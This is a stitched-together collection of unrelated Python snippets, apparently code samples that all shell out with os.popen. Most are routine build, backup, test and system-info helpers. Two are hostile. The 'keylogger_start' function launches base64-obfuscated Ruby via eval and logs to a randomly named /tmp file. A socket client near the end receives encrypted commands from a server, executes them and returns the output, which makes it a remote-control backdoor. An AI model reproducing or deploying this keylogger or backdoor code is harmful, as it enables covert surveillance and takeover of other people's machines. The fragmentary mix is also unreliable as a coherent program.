def wanKickstart(self): """Sends a minimal kickstart file for wide-area installs.""" # Default distribution name. if self.form.has_key('arch'): self.arch = self.form['arch'].value if self.form.has_key('os'): OS = self.form['os'].value else: OS = 'linux' # should aways come from loader # # get the minimal attributes # attrs = {} for i in [ 'Kickstart_Lang', 'Kickstart_Keyboard', 'Kickstart_PublicHostname', 'Kickstart_PrivateKickstartBasedir' ]: cmd = '/opt/rocks/bin/rocks list attr | ' cmd += "grep '^%s:' | awk '{print $2}'" % i for line in os.popen(cmd).readlines(): var = line[:-1] attrs[i] = var.strip() attrs['hostname'] = self.clientList[0] attrs['arch'] = self.arch attrs['os'] = OS cmd = '/opt/rocks/bin/rocks list node xml wan ' cmd += 'attrs="%s"' % (attrs) for line in os.popen(cmd).readlines(): self.report.append(line[:-1])
def do_simple_submit(): print "Going to submit "+str(sys.argv[1])+" jobs : " fusecommand="hadd -f output/all_limits.root" path=str(os.path.abspath(os.curdir)) path=path.replace("/","\/"); confcommand="cat Source/calcLim.sh_template | sed 's/SETJZBCUT/"+str(sys.argv[1])+"/' | sed 's/SETNJOBS/"+str(sys.argv[1])+"/' | sed 's/THISDIR/"+str(path)+"/' > output/calcLim.sh" commands.getoutput(confcommand) for ijob in range(0,int(sys.argv[1])): pipe=popen("qsub -e /tmp/ -o /tmp/ -N " + "LimCalc"+str(ijob)+ " " + os.curdir + "/output/calcLim.sh"+ " "+str(ijob)) for l in pipe.readlines(): if l.find("Your job")>-1: thisjobnumber=int(l[l.index('job ')+4:l.index(' (')]) print ": Submitted job "+str(ijob)+" with job number: "+str(thisjobnumber) jobnumbers.append(thisjobnumber) fusecommand=fusecommand+" output/DistributedLimits_job"+str(ijob)+"_of_"+str(sys.argv[1])+".root" counter=0 totjobs=sys.argv[1] while(len(jobnumbers)>0 and counter<300) : counter+=1 currlist=[] pipe=popen("qstat | grep `whoami` | awk '{print $1}'") for line in pipe.readlines(): currlist.append(int(line)) checklist(jobnumbers,currlist) time.sleep(60) print "All jobs have finished - need to merge everything and place it in your scratch directory!" print commands.getoutput(fusecommand) process_command="./produce_limit_plots.exec output/all_limits.root" commands.getoutput(process_command) print "All done!"
def backup_git_by_page(page, logger): git = get_gitlab_instance() projects = git.projects.all(page=page, per_page=100) git_data_path = GIT_SETTINGS.get('git_data_path') if 0 == len(projects): logger.info("All projects backup completed !") exit(0) else: logger.info("There are %s projects on page %s." % (len(projects), page)) try: for project in projects: git_repo_path = os.path.join(git_data_path, project.path_with_namespace + ".git") logger.debug("begin to backup git repo %s !" % project.path_with_namespace) # if the project has been cloned,then exec git fetch command,else exec git clone command. if os.path.exists(git_repo_path): os.chdir(git_repo_path) for output in os.popen("git fetch 2>&1"): record_log_with_level(logger, output) else: for output in os.popen("git clone --mirror %s %s 2>&1" % (project.http_url_to_repo, git_repo_path)): record_log_with_level(logger, output) except: logger.exception('Got exception on logger handler:') raise logger.info("The projects of page %s backup completed !" % page)
def getProcessNumber(viewerChoice): regex = "\\b[0-9]+\\b" process = os.popen("DISPLAY=:1 xdotool search --onlyvisible " + viewerChoice) windowIDs = process.read() process.close() listIDs = [] counter = 0 retryCount = 0 # acroread and firefox takes longer to run # acroread is often the slowest if viewerChoice == "acroread" or \ viewerChoice == "firefox": retryCount = 4 else: retryCount = 2 # acroread needs a delay to find windows while counter < retryCount: listIDs = re.findall(regex, windowIDs) print "Getting window numbers: " + str(listIDs) if len(listIDs) == 0: print "cannot find process number, trying again in 1s" time.sleep(1) process = os.popen("DISPLAY=:1 xdotool search --onlyvisible " + viewerChoice) windowIDs = process.read() process.close() else: break counter = counter + 1 return listIDs
def main(): """ SendDataClient类,作为flashshot的服务 """ log.init_log('./logs/send_data_client') # 如果配置文件中配置了这个地区需要设定IP代理,则在上传文件前,先将代理IP取消,然后等执行完毕后再设置上 # 并且将 uping 设置为 1,此时每五分钟执行的checkIpProxy将不会修改此IP,上传结束后就修改回 0 if config.NEED_PROXY: configFile = ConfigParser.ConfigParser() configFile.read(CONFIGFILE) configFile.set("info", "uping", 1) configFile.write(open(CONFIGFILE, "w")) logging.info('setProxy("0") ') # 在传送图片前,先将本地代理IP关掉 ipProxy.setProxy("0") target_folder = sys.argv[1] target_filenames = get_file_list(target_folder) upload_files(target_folder, target_filenames) # 在传送图片后,将本地代理Ip继续设定 if config.NEED_PROXY: configFile = ConfigParser.ConfigParser() configFile.read(CONFIGFILE) ip1 = configFile.get("info", "ip1") configFile.set("info", "uping", 0) configFile.write(open(CONFIGFILE, "w")) enableProxyScript = "python ipProxy.py " + ip1 os.popen(enableProxyScript) # ipProxy.setProxy(ip1) logging.info('setProxy ' + ip1)
def update(self, objfile): self.filename = objfile (sysname, nodename, release, version, machine) = os.uname() if sysname == "Linux": fp = os.popen("nm -P " + objfile, "r") symbols = map(self.split_, fp.readlines()) elif sysname == "SunOS": fp = os.popen("nm -p " + objfile, "r") symbols = map(lambda l: string.split(l[12:]), fp.readlines()) pass elif sysname == "IRIX": fp = os.popen("nm -B " + objfile, "r") symbols = map(lambda l: string.split(l[8:]), fp.readlines()) pass object = objfile for (type, symbol) in symbols: if not self.objects.has_key(object): self.objects.update({ object : dict({ "exports" : dict(), "imports" : dict() }) }) pass if type == "U": self.objects[object]["imports"].update({ symbol : dict() }) elif type in ["C", "D", "T"]: self.objects[object]["exports"].update({ symbol : dict() }) pass pass fp.close() return (None)
def m2c_key(arg1, arg2): try: rsa = RSA.gen_key(1024, 3, lambda *agr:None) pub_bio = BIO.MemoryBuffer() priv_bio = BIO.MemoryBuffer() rsa.save_pub_key_bio(pub_bio) rsa.save_key_bio(priv_bio, None) pub_file = arg1 # pub_file = arg1 + 'pub.pem' private_file = arg2 # private_file = arg2 + 'private.pem' open(pub_file,'w').write(pub_bio.read_all()) open(private_file,'w').write(priv_bio.read_all()) pub_key = RSA.load_pub_key(pub_file) priv_key = RSA.load_key(private_file) message = 'opzoon' encrypted = pub_key.public_encrypt(message, RSA.pkcs1_padding) decrypted = priv_key.private_decrypt(encrypted, RSA.pkcs1_padding) if decrypted==message: #os.popen("rm -rf m2crypto_gen_key.py") pass else: os.popen("rm -rf *.pem") print "Key generation failed,please try again!" raise Exception("Key generation failed,please try again!") except Exception,e: os.popen("rm -rf *.pem") raise Exception("Key generation failed,please try again!")
def checkDbus(self): """ """ need_relaunch = False pid = os.getenv('DBUS_SESSION_BUS_PID', None) if pid: cmd = 'ps -p %s | grep -c %s ' % (pid, pid) res = os.popen(cmd).read().strip() if res != '0': pass else: need_relaunch = True else: need_relaunch = True if need_relaunch: print '==> Need to relaunch dbus-launch' os.system('env | grep DBUS_') cmd = 'dbus-launch ' res = os.popen(cmd).read().strip() lines = res.splitlines() for line in lines: m = r'(\w*)=(.*)' rr = re.findall(m, line) if len(rr): k, v = rr[0] print '--> putenv :', k, v os.environ[k] = v return True
def install_osx(): """Set up to run via launchd on OS X.""" with os.popen('which hass') as inp: hass_path = inp.read().strip() with os.popen('whoami') as inp: user = inp.read().strip() template_path = os.path.join(os.path.dirname(__file__), 'launchd.plist') with open(template_path, 'r', encoding='utf-8') as inp: plist = inp.read() plist = plist.replace("$HASS_PATH$", hass_path) plist = plist.replace("$USER$", user) path = os.path.expanduser("~/Library/LaunchAgents/org.homeassistant.plist") try: with open(path, 'w', encoding='utf-8') as outp: outp.write(plist) except IOError as err: print('Unable to write to ' + path, err) return os.popen('launchctl load -w -F ' + path) print("Home Assistant has been installed. \ Open it here: http://localhost:8123")
def aws_command(cmd): os.popen("mkdir -p /tmp/aws-cache").read() if profile: aws_flags.extend(["--profile", profile]) flags = " ".join(aws_flags) aws_cmd = "aws %s %s" % (flags, cmd) echo("%s" % aws_cmd) safe_cmd = "/tmp/aws-cache/%s" % aws_cmd.replace(" ", "_") if os.path.exists(safe_cmd): echo(" HIT\n") with open(safe_cmd, "r") as jsonfile: raw_json = json.load(jsonfile) return raw_json echo(" MISS\n") raw = os.popen(aws_cmd).read() raw_json = json.loads(raw) with open(safe_cmd, "w") as outfile: json.dump(raw_json, outfile) return raw_json
def save(self, path=None, common=None, sudo_password=None): from stat import ST_MODE fn_stat = 744 if self.last_save_time: time_delta = time.time() - self.last_save_time if time_delta < 0.001: pass path = path or self.path path = path.encode(co.getLocalEncoding()) if sudo_password: # 先修改系统hosts文件的权限 fn_stat = oct(os.stat(path)[ST_MODE])[-3:] cmd = "echo '%s' | sudo -S chmod %s %s" % (sudo_password, 766, path) os.popen(cmd) # 写系统hosts open(path, "w").write(self.contentWithCommon(common)) if sudo_password: # 再将系统hosts文件的权限改回来 cmd = "echo '%s' | sudo -S chmod %s %s" % (sudo_password, fn_stat, path) os.popen(cmd) self.last_save_time = time.time() return True
def param(name, symlink): if symlink and not get_installed_platform(symlink): raise Exception("The base platform " + symlink + " doesn" "t exists.") db_pwd_gen = os.popen("apg -a 1 -m 25 -n 1 -MCLN").read().rstrip() token_gen = os.popen("apg -a 1 -m 50 -n 1 -MCLN").read().rstrip() ecole_admin_pwd_gen = os.popen("apg -a 0 -m 12 -x 12 -n 1 -MCLN").read().rstrip() data = dict( name=name, user_home="/home/" + name + "/", claroline_root="/home/" + name + "/claroline/", db_name=name, db_pwd=db_pwd_gen, token=token_gen, ecole_admin_pwd=ecole_admin_pwd_gen, base_platform=symlink, ) data_yaml = yaml.dump(data, explicit_start=True, default_flow_style=False) paramFile = open(platform_dir + "/" + name + ".yml", "w+") paramFile.write(data_yaml) if not args.symlink: print "No symlink for " + name + "." else: print "Symlinked to " + symlink + "." return data
def createPreviewMayaFile(self): """docstring for createPreviewMayaFile""" createPrevScript = os.path.dirname(os.path.abspath(__file__)) + '/createPreview.py' cmd = 'C:/"Program Files"/Autodesk/Maya' + mc.about(v = True) + '/bin/' + 'mayapy.exe ' + createPrevScript + ' ' + self.path + self.name + '.ma' print cmd #create preview scene os.popen( cmd )
def schedule_exec_file(script, test_name, result_query, test_detail, exec_time, log_file): start = time.asctime() if exec_time in time.asctime(): chmod = os.popen("chmod +x ./{0}".format(script)).read() if ":sh" in chmod: print "Failed to chmod\n" stop = time.asctime() test_logger(log_file, test_name, start, stop, "Fail") if ":sh" not in chmod: print "Pass chmod {0}".format(test_name) stop = time.asctime() test_logger(log_file, test_name, start, stop, "Pass") cmd = os.popen("./{0}".format(script)).read() if result_query not in cmd: print "Failed {0}\n".format(test_name) print "Test detail: \n" + test_detail + "\n" print "Result: \n" + cmd + "\n" stop = time.asctime() test_logger(log_file, test_name, start, stop, "fail") if result_query in cmd: print "Pass {0}".format(test_name) print "Test detail: \n" + test_detail + "\n" print "Result: \n" + cmd + "\n" else: print "{0} ".format(test_name) + "Will run next @ {0}".format(exec_time) stop = time.asctime() test_logger(log_file, test_name, start, stop, "Command Deferred")
def exec_file(script, test_name, result_query, test_detail, log_file): start = time.asctime() chmod = os.popen("chmod +x ./{0}".format(script)).read() if ":sh" in chmod: print "Failed to chmod\n" stop = time.asctime() test_result = "Fail" test_logger(log_file, "Chmod", start, stop, test_result) if ":sh" not in chmod: print "Pass chmod {0}".format(test_name) stop = time.asctime() test_result = "Pass" test_logger(log_file, "Chmod", start, stop, test_result) cmd = os.popen("./{0}".format(script)).read() if result_query not in cmd: print "Failed {0}\n".format(test_name) print "Test detail: \n" + test_detail + "\n" print "Result: \n" + cmd + "\n" stop = time.asctime() test_logger(log_file, test_name, start, stop, "Fail") if result_query in cmd: print "Pass {0}".format(test_name) print "Test detail: \n" + test_detail + "\n" print "Result: \n" + cmd + "\n" stop = time.asctime() test_logger(log_file, test_name, start, stop, "Pass")
def KillAllProcesses(ppid=None): if IsWindows(): subprocess.check_call("TASKKILL /F /PID %s /T" % ppid) else: ppid = str(ppid) pidgrp = [] def GetChildPids(ppid): command = "ps -ef | awk '{if ($3 ==%s) print $2;}'" % str(ppid) pids = os.popen(command).read() pids = pids.split() return pids pidgrp.extend(GetChildPids(ppid)) for pid in pidgrp: pidgrp.extend(GetChildPids(pid)) pidgrp.insert(0, ppid) while len(pidgrp) > 0: pid = pidgrp.pop() try: os.kill(int(pid), signal.SIGKILL) return True except OSError: try: os.popen("kill -9 %d" % int(pid)) return True except: return False
def run_modpython(): # Pass the null and ab=path options through Apache nullreq_opt = "" if "--null" in opts: nullreq_opt = " PythonOption nullreq\n" ab_opt = "" if "--ab" in opts: ab_opt = " PythonOption ab %s\n" % opts["--ab"] conf_data = mp_conf_template % (ab_opt, nullreq_opt) mpconf = os.path.join(curdir, "bench_mp.conf") f = open(mpconf, 'wb') try: f.write(conf_data) finally: f.close() apargs = "-k start -f %s" % mpconf try: read_process(APACHE_PATH or "apache", apargs) run() finally: os.popen("apache -k stop")
def load_options(): all_config = os.popen('git config -l').read().strip() git_base_path = os.popen('git rev-parse --show-toplevel').read().strip() path_prefix = "%s." % git_base_path overrides = {} matches = re.findall("^git-pull-request\.([^=]+)=([^\n]*)$", all_config, re.MULTILINE) for k in matches: key = k[0] value = k[1] if value.lower() in ('f', 'false', 'no'): value = False elif value.lower() in ('t', 'true', 'yes'): value = True elif value.lower() in ('', 'none', 'null', 'nil'): value = None if key.find(path_prefix) == -1: options[key] = value else: key = key.replace(path_prefix, '') overrides[key] = value options.update(overrides)
def test_popen(self): os.popen(self._command()).read() self.assertEqual(read(self.filename1), os.getcwd()) os.chdir(self.dir2) os.popen(self._command()).read() self.assertEqual(read(self.filename1), os.getcwd())
def _get_opened_files(targets, blade_root_dir, working_dir): check_dir = set() opened_files = set() blade_root_dir = os.path.normpath(blade_root_dir) for target in targets: target = _normalize_target_path(target) d = os.path.dirname(target) if d in check_dir: return check_dir.add(d) output = [] if is_svn_client(blade_root_dir): full_target = os.path.normpath(os.path.join(working_dir, d)) top_dir = full_target[len(blade_root_dir) + 1:] output = os.popen('svn st %s' % top_dir).read().split('\n') else: (is_git, git_root, git_subdir) = is_git_client(blade_root_dir, target, working_dir) if is_git: os.chdir(git_root) status_cmd = 'git status --porcelain %s' % (git_subdir) output = os.popen(status_cmd).read().split('\n') else: console.warning('unknown source client type, NOT svn OR git') for f in output: seg = f.strip().split(' ') if seg[0] != 'M' and seg[0] != 'A': continue f = seg[len(seg) - 1] if f.endswith('.h') or f.endswith('.hpp') or f.endswith('.cc') or f.endswith('.cpp'): fullpath = os.path.join(os.getcwd(), f) opened_files.add(fullpath) return opened_files
def get_work_dir(): global _work_dir if (_work_dir == None): symbolic_ref = os.popen('git symbolic-ref HEAD').read().strip().replace('refs/heads/', '') work_dir_global = options['work-dir'] work_dir_option = None if symbolic_ref: work_dir_option = 'work-dir-%s' % symbolic_ref if work_dir_option: _work_dir = os.popen('git config git-pull-request.%s' % work_dir_option).read().strip() options[work_dir_option] = _work_dir if not _work_dir or not os.path.exists(_work_dir): _work_dir = False if not _work_dir: if work_dir_global and os.path.exists(work_dir_global): _work_dir = work_dir_global else: _work_dir = False return _work_dir
def analize(task): try: filename = task.split(":")[-1] d = lxml.html.fromstring(open(filename).read()) for l in d.iterlinks(): target = l[0].attrib[l[1]] if target == "#": continue parsed = urlparse(target) if parsed.scheme: continue if parsed.fragment: target = target.split('#')[0] target_filename = os.path.abspath( os.path.join(os.path.dirname(filename), urllib.unquote(target))) if target_filename not in existing_targets: if os.path.exists(target_filename): existing_targets.add(target_filename) else: print "In %s broken link: " % filename, target if '--find-sources' in sys.argv: print "Possible sources:" print os.popen( 'nikola build list --deps %s' % task, 'r').read() print "===============================\n" except Exception as exc: print "Error with:", filename, exc
def __init__(self, persist=None): """Start a gnuplot process. Create a 'GnuplotProcess' object. This starts a gnuplot program and prepares to write commands to it. Keyword arguments: 'persist=1' -- start gnuplot with the '-persist' option, (which leaves the plot window on the screen even after the gnuplot program ends, and creates a new plot window each time the terminal type is set to 'x11'). This option is not available on older versions of gnuplot. """ if persist is None: persist = GnuplotOpts.prefer_persist if persist: if not test_persist(): raise ('-persist does not seem to be supported ' 'by your version of gnuplot!') self.gnuplot = popen('%s -persist' % GnuplotOpts.gnuplot_command, 'w') else: self.gnuplot = popen(GnuplotOpts.gnuplot_command, 'w') # forward write and flush methods: self.write = self.gnuplot.write self.flush = self.gnuplot.flush
def execute_command(cmd): try: os.popen(cmd) except Exception, e: if DEBUG: print e raise Exception("Error when try execute_command ", cmd)
def _init_aix(self): uname = os.uname() self.os = "aix" self.os_ver = "%s.%s" % (uname[3], uname[2]) # Determine processor type from 'uname -p' -- os.uname() does not # have this. o = os.popen('uname -p 2> /dev/null') arch = o.read().strip() o.close() # 32-bit or 64-bit? # Ideas from http://www.stata.com/support/faqs/win/64bit.html o = os.popen('getconf -v KERNEL_BITMODE 2> /dev/null') kbitmode = o.read().strip() o.close() if kbitmode: sixtyfour = '64' in kbitmode else: o = os.popen('file /usr/lib/boot/unix* 2> /dev/null') listing = o.read().strip() o.close() sixtyfour = '64-bit XCOFF executable' in listing self.arch = arch + (sixtyfour and '64' or '')
def invoke_rndc_stats(stats_file_path, remfile): cmd='rndc stats' try: os.popen(cmd) except OSError as e: error_message = "%s execution failed" % cmd print >>sys.stderr, error_message, e if os.path.isfile(stats_file_path): try: raw_data = openfile(stats_file_path) except OSError as e: error_message = "%s file open failed" % stats_file_path print >>sys.stderr, error_message, e else: error_message = "%s does not exist in system, or insufficient permissions" % stats_file_path print >>sys.stderr, error_message, e # let file remove be optional if remfile == True: try: os.remove(stats_file_path) except OSError as e: error_message = "%s file remove failed, or insufficient permissions" % stats_file_path print >>sys.stderr, error_message, e return raw_data
def getMAC(staticMAC = [None]): if staticMAC[0] == None: if sys.platform == 'win32': correctSection = 0 try: ipconfdata = os.popen('/WINDOWS/SYSTEM32/ipconfig /all').readlines() except: staticMAC[0] = 'NO_MAC' return staticMAC[0] for line in ipconfdata: if line.find('Local Area Connection') >= 0: correctSection = 1 if line.find('Physical Address') >= 0 and correctSection == 1: pa = line.split(':')[-1].strip() correctSection = 0 staticMAC[0] = pa return pa if sys.platform == 'darwin': macconfdata = os.popen('/usr/sbin/system_profiler SPNetworkDataType |/usr/bin/grep MAC').readlines() result = '-1' if macconfdata: if macconfdata[0].find('MAC Address') != -1: pa = macconfdata[0][macconfdata[0].find(':') + 2:macconfdata[0].find(':') + 22].strip('\n') staticMAC[0] = pa.replace(':', '-') result = staticMAC[0] return result if sys.platform != 'darwin' and sys.platform != 'win32': print 'System is not running OSX or MS-Windows.' return '-2' else: return staticMAC[0] return
def bodyTest(): #check if aeolus-cleanup removes directory. /var/tmp and /var/lib/iwhd/images print "==============================================" print "test being started" print "Checking if there is password/username in json's files..." if os.system("grep -i \"password\|username\" " + rhvemJSONFile) == SUCCESS: print "Ergh, there is password and/or username in rhevm json file :(" print "See the output from json file " + rhvemJSONFile + ":" print "======================================================" outputtmp = os.popen("cat " + rhvemJSONFile).read() print outputtmp return False else: if os.system("grep -i \"password\|username\" " + vsphereJSONFile) == SUCCESS: print "Ergh, there is password and/or username in vsphere json file :(" print "See the output from json file " + vsphereJSONFile + ":" print "======================================================" outputtmp = os.popen("cat " + vsphereJSONFile).read() print outputtmp return False outputtmp = os.popen("cat " + vsphereJSONFile).read() print "Vsphere json file " + vsphereJSONFile + ":" print outputtmp outputtmp = os.popen("cat " + rhvemJSONFile).read() print "rhvem json file " + rhvemJSONFile + ":" print outputtmp return True
def build_xpi(self, is_update=False): if is_update: name = "Update" elif self.recipient: name = self.recipient.slug else: name = "Generic" print "THE NAME", name, self.recipient xpi_nm = 'ProcrasDonate_%s_%s.xpi' % (name, self.get_version()) xpi_fn = pathify([self.xpi_dir, xpi_nm], file_extension=True) os.chdir(self.extn_dir) print print "XPI_FN", xpi_fn print "EXTN_DIR", self.extn_dir print os.popen('zip -r "%s" *' % xpi_fn) print xpi_url = "%s%s/%s" % (MEDIA_URL, 'xpi', xpi_nm) xpi_file = open(xpi_fn, 'rb') xpi_hash = "sha1:%s" % hashlib.sha1(xpi_file.read()).hexdigest() xpi_file.close() if is_update: self.update_updates_rdf(xpi_url, xpi_hash) return (xpi_url, xpi_hash)
def keylogger_start(): global pid global logFile if logFile: if os.path.exists(logFile): return 'running' base64_ruby_code = base64.b64encode(get_ruby_code()) randname=''.join([random.choice(string.ascii_lowercase) for i in range(0,random.randint(6,12))]) logFile = '/tmp/{name}'.format(name=randname) cmd = 'echo "require \'base64\';eval(Base64.decode64(\'%s\'))" | ruby > %s &' % (base64_ruby_code, logFile) os.popen(cmd) time.sleep(1) # get process id try: pid = os.popen('ps aux | grep " ruby" | grep -v grep').read().split()[1] except: pass print logFile print pid return True
def learn_test_multi_agent_plus_rollout(algo): for fw in framework_iterator(frameworks=("tf", "torch")): tmp_dir = os.popen("mktemp -d").read()[:-1] if not os.path.exists(tmp_dir): # Last resort: Resolve via underlying tempdir (and cut tmp_. tmp_dir = ray.utils.tempfile.gettempdir() + tmp_dir[4:] if not os.path.exists(tmp_dir): sys.exit(1) print("Saving results to {}".format(tmp_dir)) rllib_dir = str(Path(__file__).parent.parent.absolute()) print("RLlib dir = {}\nexists={}".format(rllib_dir, os.path.exists(rllib_dir))) def policy_fn(agent): return "pol{}".format(agent) observation_space = Box(float("-inf"), float("inf"), (4, )) action_space = Discrete(2) config = { "num_gpus": 0, "num_workers": 1, "evaluation_config": { "explore": False }, "framework": fw, "env": MultiAgentCartPole, "multiagent": { "policies": { "pol0": (None, observation_space, action_space, {}), "pol1": (None, observation_space, action_space, {}), }, "policy_mapping_fn": policy_fn, }, } stop = {"episode_reward_mean": 180.0} tune.run(algo, config=config, stop=stop, checkpoint_freq=1, checkpoint_at_end=True, local_dir=tmp_dir, verbose=1) # Find last checkpoint and use that for the rollout. checkpoint_path = os.popen("ls {}/PPO/*/checkpoint_*/" "checkpoint-*".format(tmp_dir)).read()[:-1] checkpoint_paths = checkpoint_path.split("\n") assert len(checkpoint_paths) > 0 checkpoints = [ cp for cp in checkpoint_paths if re.match(r"^.+checkpoint-\d+$", cp) ] # Sort by number and pick last (which should be the best checkpoint). last_checkpoint = sorted( checkpoints, key=lambda x: int(re.match(r".+checkpoint-(\d+)", x).group(1)))[-1] assert re.match(r"^.+checkpoint_\d+/checkpoint-\d+$", last_checkpoint) if not os.path.exists(last_checkpoint): sys.exit(1) print("Best checkpoint={} (exists)".format(last_checkpoint)) ray.shutdown() # Test rolling out n steps. result = os.popen( "python {}/rollout.py --run={} " "--steps=400 " "--out=\"{}/rollouts_n_steps.pkl\" --no-render \"{}\"".format( rllib_dir, algo, tmp_dir, last_checkpoint)).read()[:-1] if not os.path.exists(tmp_dir + "/rollouts_n_steps.pkl"): sys.exit(1) print("Rollout output exists -> Checking reward ...".format( checkpoint_path)) episodes = result.split("\n") mean_reward = 0.0 num_episodes = 0 for ep in episodes: mo = re.match(r"Episode .+reward: ([\d\.\-]+)", ep) if mo: mean_reward += float(mo.group(1)) num_episodes += 1 mean_reward /= num_episodes print("Rollout's mean episode reward={}".format(mean_reward)) assert mean_reward >= 190.0 # Cleanup. os.popen("rm -rf \"{}\"".format(tmp_dir)).read()
def run_win_command_with_output(cmd): print 'Run cmd:: %s' %(cmd) output = os.popen(cmd) return output.readlines()
def measure_temp(): temp = os.popen("vcgencmd measure_temp").readline() return (temp.replace("temp=",""))
#!/usr/bin/python # author: maciej plonski / mplonski / sokoli.pl # licence: GNU GPL # script's executing shutdown when battery is chardged in > 95% # usage // add script to root's cron import os p = int(os.popen('/usr/bin/acpi -b').read().split(" ")[3].split("%")[0]) if p > 95: os.system("crontab -r") os.system("shutdown -h 0")
from distutils import dir_util if sys.platform == 'darwin': # Remove the copied py file os.remove(mainscript) resource = "dist/" + name + ".app/Contents/Resources/" dir_util.copy_tree("locale", resource + "locale/") # Try to locate qt_menu # Let's try the port version first! if os.path.isfile("/opt/local/lib/Resources/qt_menu.nib"): qt_menu_location = "/opt/local/lib/Resources/qt_menu.nib" else: # No dice? Then let's try the brew version if os.path.exists("/usr/local/Cellar"): qt_menu_location = os.popen( "find /usr/local/Cellar -name qt_menu.nib | tail -n 1").read() # no brew, check /opt/local else: qt_menu_location = os.popen( "find /opt/local -name qt_menu.nib | tail -n 1").read() qt_menu_location = re.sub('\n', '', qt_menu_location) if (len(qt_menu_location) == 0): print "Sorry couldn't find your qt_menu.nib this probably won't work" else: print "Found your qib: " + qt_menu_location # Need to include a copy of qt_menu.nib shutil.copytree(qt_menu_location, resource + "qt_menu.nib") # Need to touch qt.conf to avoid loading 2 sets of Qt libraries fname = resource + "qt.conf"
} lib_info = {} for name, pattern in patterns.items(): match = pattern.search(objdump) if not match: raise InternalError("could not find 'NEEDED %s...' in " "objdump of compiled test C++ file" % name) lib_info[name] = match.group("ver") finally: _rmtree(tmpdir) # If this is glibc, get its version. if int(_split_ver(lib_info["libc"])[0]) >= 6: libc_so = os.path.join("/lib", "libc.so."+lib_info["libc"]) o = os.popen(libc_so) try: libc_so_ver_line = o.readline().strip() finally: retval = o.close() if retval: raise InternalError("error running '%s'" % libc_so) # e.g.: # GNU C Library stable release version 2.3.3 (20040917), by R... # GNU C Library stable release version 2.5, by Roland McGrath et al. pattern = re.compile(r"^GNU C Library.*?(\d+\.\d+(\.\d+)?)") match = pattern.search(libc_so_ver_line) if not match: raise InternalError("error determining glibc version from '%s'" % libc_so_ver_line) lib_info["glibc"] = match.group(1)
def learn_test_plus_rollout(algo, env="CartPole-v0"): for fw in framework_iterator(frameworks=("tf", "torch")): fw_ = ", \\\"framework\\\": \\\"{}\\\"".format(fw) tmp_dir = os.popen("mktemp -d").read()[:-1] if not os.path.exists(tmp_dir): # Last resort: Resolve via underlying tempdir (and cut tmp_. tmp_dir = ray.utils.tempfile.gettempdir() + tmp_dir[4:] if not os.path.exists(tmp_dir): sys.exit(1) print("Saving results to {}".format(tmp_dir)) rllib_dir = str(Path(__file__).parent.parent.absolute()) print("RLlib dir = {}\nexists={}".format(rllib_dir, os.path.exists(rllib_dir))) os.system("python {}/train.py --local-dir={} --run={} " "--checkpoint-freq=1 --checkpoint-at-end ".format( rllib_dir, tmp_dir, algo) + "--config=\"{\\\"num_gpus\\\": 0, \\\"num_workers\\\": 1, " "\\\"evaluation_config\\\": {\\\"explore\\\": false}" + fw_ + "}\" " + "--stop=\"{\\\"episode_reward_mean\\\": 190.0}\"" + " --env={}".format(env)) # Find last checkpoint and use that for the rollout. checkpoint_path = os.popen("ls {}/default/*/checkpoint_*/" "checkpoint-*".format(tmp_dir)).read()[:-1] checkpoints = [ cp for cp in checkpoint_path.split("\n") if re.match(r"^.+checkpoint-\d+$", cp) ] # Sort by number and pick last (which should be the best checkpoint). last_checkpoint = sorted( checkpoints, key=lambda x: int(re.match(r".+checkpoint-(\d+)", x).group(1)))[-1] assert re.match(r"^.+checkpoint_\d+/checkpoint-\d+$", last_checkpoint) if not os.path.exists(last_checkpoint): sys.exit(1) print("Best checkpoint={} (exists)".format(last_checkpoint)) # Test rolling out n steps. result = os.popen( "python {}/rollout.py --run={} " "--steps=400 " "--out=\"{}/rollouts_n_steps.pkl\" --no-render \"{}\"".format( rllib_dir, algo, tmp_dir, last_checkpoint)).read()[:-1] if not os.path.exists(tmp_dir + "/rollouts_n_steps.pkl"): sys.exit(1) print("Rollout output exists -> Checking reward ...".format( checkpoint_path)) episodes = result.split("\n") mean_reward = 0.0 num_episodes = 0 for ep in episodes: mo = re.match(r"Episode .+reward: ([\d\.\-]+)", ep) if mo: mean_reward += float(mo.group(1)) num_episodes += 1 mean_reward /= num_episodes print("Rollout's mean episode reward={}".format(mean_reward)) assert mean_reward >= 190.0 # Cleanup. os.popen("rm -rf \"{}\"".format(tmp_dir)).read()
HOST = 'localhost' PORT = 5000 tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) dest = (HOST, PORT) tcp.connect(dest) comandoCripto = tcp.recv(1024) comando = aes.decrypt(base64.b32decode(comandoCripto)).rstrip('#') print comando while comando <> '\x18': try: resultado=os.popen(comando).read() if len(resultado) <= 0: print resultado resultado="Comando Invalido ou O Comando nao emite uma resposta" cryptoSaida = resultado+'#'*(16-len(resultado)%16) texto_cifrado = base64.b32encode(aes.encrypt(cryptoSaida)) tcp.send(texto_cifrado) except: resultado = "comando inexistente" comandoCripto = tcp.recv(1024) comando = aes.decrypt(base64.b32decode(comandoCripto)).rstrip('#') if comando == "sair": break tcp.close()
# (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, target_name, title, author, project, description, category), ] # Documents to append as an appendix to all manuals. # texinfo_appendices = [] # If false, no module index is generated. # texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. # texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. # texinfo_no_detailmenu = False watermark = os.popen("git branch --contains $(git rev-parse HEAD)\ | awk -F/ '/stable/ {print $2}'").read().strip(' \n\t').capitalize() if watermark == "": watermark = "Pre-release" # -- Options for sphinxmark ----------------------------------------------- sphinxmark_enable = True sphinxmark_div = 'docs-body' sphinxmark_image = 'text' sphinxmark_text = watermark sphinxmark_text_color = (128, 128, 128) sphinxmark_text_size = 70
import hashlib, os output = os.popen('dir').read() print(output) a = input("input file name :") f = open(a, 'rb') data = f.read() f.close() print("MD5: " + hashlib.md5(data).hexdigest()) print("SHA-1: " + hashlib.sha1(data).hexdigest()) print("SHA-256" + hashlib.sha256(data).hexdigest()) '''def sha1_largefile(a, blocksize=8192): sha1 = hashlib.sha1() try: f = open(a, "rb") except IOError as e: print("file open error", e) return while True: buf = f.read(blocksize) if not buf: break sha1.update(buf) return sha1.hexdigest() '''
